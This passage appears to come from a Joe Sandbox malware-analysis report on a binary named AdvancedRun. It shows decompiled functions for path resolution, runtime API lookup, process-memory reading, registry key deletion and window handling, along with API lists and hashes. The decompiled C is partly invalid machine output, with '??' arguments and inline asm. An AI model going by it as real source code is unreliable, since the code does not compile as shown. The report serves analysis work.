				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                  0x0040920a
                                                                  0x00409218
                                                                  0x00409223
                                                                  0x0040922c
                                                                  0x0040924b
                                                                  0x00409253
                                                                  0x0040929b
                                                                  0x004092e4
                                                                  0x0040929d
                                                                  0x004092a3
                                                                  0x004092b1
                                                                  0x004092bd
                                                                  0x004092cc
                                                                  0x004092d1
                                                                  0x004092d8
                                                                  0x004092dd
                                                                  0x00409255
                                                                  0x0040925b
                                                                  0x00409269
                                                                  0x00409275
                                                                  0x00409282
                                                                  0x0040928d
                                                                  0x00409292
                                                                  0x004092ec
                                                                  0x004092ef
                                                                  0x004092ef
                                                                  0x00409231
                                                                  0x00409232
                                                                  0x00409233
                                                                  0x00000000
                                                                  0x00409239
                                                                  0x0040921a
                                                                  0x00000000

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409223
                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                  • memset.MSVCRT ref: 00409269
                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                  • memset.MSVCRT ref: 004092B1
                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                  • String ID: \systemroot
                                                                  • API String ID: 4173585201-1821301763
                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 48%
                                                                  			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                  0x00409c73
                                                                  0x00409c7c
                                                                  0x00409c90
                                                                  0x00409c9f
                                                                  0x00409ca2
                                                                  0x00409ca7
                                                                  0x00409ca9
                                                                  0x00409cb1
                                                                  0x00409cc0
                                                                  0x00409cc2
                                                                  0x00409cc7
                                                                  0x00409ccf
                                                                  0x00409cd0
                                                                  0x00409cd7
                                                                  0x00409cd8
                                                                  0x00409cd9
                                                                  0x00409cda
                                                                  0x00409cdc
                                                                  0x00409ce0
                                                                  0x00409ce1
                                                                  0x00409ce9
                                                                  0x00409cf1
                                                                  0x00409cfb
                                                                  0x00409d08
                                                                  0x00409d08
                                                                  0x00000000
                                                                  0x00409d0d
                                                                  0x00409d0f

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                  • API String ID: 1027343248-2054640941
                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                  0x00401ac9
                                                                  0x00401ad1
                                                                  0x00401ae1
                                                                  0x00401ae7
                                                                  0x00401ae9
                                                                  0x00401aec
                                                                  0x00401c1b
                                                                  0x00401af2
                                                                  0x00401af2
                                                                  0x00401af8
                                                                  0x00401b0c
                                                                  0x00401b1a
                                                                  0x00401bfd
                                                                  0x00401b20
                                                                  0x00401b26
                                                                  0x00401b2b
                                                                  0x00401b36
                                                                  0x00401b40
                                                                  0x00401b43
                                                                  0x00401b4a
                                                                  0x00401b54
                                                                  0x00401b55
                                                                  0x00401b56
                                                                  0x00401b57
                                                                  0x00401b58
                                                                  0x00401b63
                                                                  0x00401b68
                                                                  0x00401b69
                                                                  0x00401b77
                                                                  0x00401b7d
                                                                  0x00401b82
                                                                  0x00401b82
                                                                  0x00401b88
                                                                  0x00401b8b
                                                                  0x00401b8e
                                                                  0x00401b91
                                                                  0x00401b98
                                                                  0x00401b9b
                                                                  0x00401ba0
                                                                  0x00401ba5
                                                                  0x00401baa
                                                                  0x00401bac
                                                                  0x00401bac
                                                                  0x00401bb2
                                                                  0x00401bb2
                                                                  0x00401bbe
                                                                  0x00401bc4
                                                                  0x00401bc6
                                                                  0x00401bc8
                                                                  0x00401bc8
                                                                  0x00401bd7
                                                                  0x00401bee
                                                                  0x00401bf0
                                                                  0x00401bf0
                                                                  0x00401c0e
                                                                  0x00401c0e
                                                                  0x00401c23

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                  • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                  • memset.MSVCRT ref: 00401B4A
                                                                  • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                  • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                  • String ID: %d %I64x
                                                                  • API String ID: 2567117392-2565891505
                                                                  • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                  • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 39%
                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                  0x004045c2
                                                                  0x004045d1
                                                                  0x004045da
                                                                  0x004045ef
                                                                  0x004045f6
                                                                  0x00404604
                                                                  0x0040460b
                                                                  0x00404610
                                                                  0x00404616
                                                                  0x00404617
                                                                  0x00404618
                                                                  0x00404628
                                                                  0x00404629
                                                                  0x0040462a
                                                                  0x0040462f
                                                                  0x00404630
                                                                  0x00404631
                                                                  0x0040463c
                                                                  0x0040463d
                                                                  0x0040463e
                                                                  0x00404656
                                                                  0x00404662
                                                                  0x0040466b
                                                                  0x0040466d
                                                                  0x0040466e
                                                                  0x00404674
                                                                  0x00404679

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                  • API String ID: 1018939227-3575174989
                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                  0x0040314a
                                                                  0x00403151
                                                                  0x00403158
                                                                  0x0040315a
                                                                  0x00403162
                                                                  0x00403166
                                                                  0x00403190
                                                                  0x00403190
                                                                  0x00403198
                                                                  0x00403199
                                                                  0x0040319e
                                                                  0x004031bb
                                                                  0x004031a0
                                                                  0x004031ad
                                                                  0x004031b6
                                                                  0x004031b6
                                                                  0x0040319e
                                                                  0x0040316e
                                                                  0x00403176
                                                                  0x0040317c
                                                                  0x0040317f
                                                                  0x0040317f
                                                                  0x00403182
                                                                  0x0040318a
                                                                  0x00000000
                                                                  0x0040318c
                                                                  0x0040318c
                                                                  0x00000000
                                                                  0x0040318c

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                  • API String ID: 2780580303-317687271
                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                  0x00404da9
                                                                  0x00404dbc
                                                                  0x00404dbf
                                                                  0x00404dc6
                                                                  0x00404dcc
                                                                  0x00404dce
                                                                  0x00404de1
                                                                  0x00404deb
                                                                  0x00404df2
                                                                  0x00404df4
                                                                  0x00404df4
                                                                  0x00404e07
                                                                  0x00404e0d
                                                                  0x00404e18
                                                                  0x00404e1c
                                                                  0x00404e1e
                                                                  0x00404e27
                                                                  0x00404e28
                                                                  0x00404e29
                                                                  0x00404e2f
                                                                  0x00404e31
                                                                  0x00404e37
                                                                  0x00404e41
                                                                  0x00404e42
                                                                  0x00404e43
                                                                  0x00404e46
                                                                  0x00404e46
                                                                  0x00404e1c
                                                                  0x00404e4d
                                                                  0x00404e50
                                                                  0x00404e5f
                                                                  0x00404e66
                                                                  0x00404e52
                                                                  0x00404e52
                                                                  0x00404e52
                                                                  0x00404e6d
                                                                  0x00404e70
                                                                  0x00404e85
                                                                  0x00404e85
                                                                  0x00000000
                                                                  0x00404e72
                                                                  0x00404e7b
                                                                  0x00404e80
                                                                  0x00404e83
                                                                  0x00404e87
                                                                  0x00404e89
                                                                  0x00404e8b
                                                                  0x00404e8b
                                                                  0x00404ea8
                                                                  0x00404ea8
                                                                  0x00000000
                                                                  0x00404e83

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                  • String ID:
                                                                  • API String ID: 2163313125-0
                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 88%
                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                  0x0040639c
                                                                  0x004063a4
                                                                  0x004063b2
                                                                  0x004063c2
                                                                  0x004063d3
                                                                  0x004063dc
                                                                  0x004063eb
                                                                  0x004063f0
                                                                  0x00406401
                                                                  0x00000000
                                                                  0x0040641e
                                                                  0x0040641f

                                                                  APIs
                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32(0040FDA0,?,0040C4E8,0040FE30,?,0040FB90), ref: 00405F30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                  • API String ID: 3176057301-2039793938
                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 16%
                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
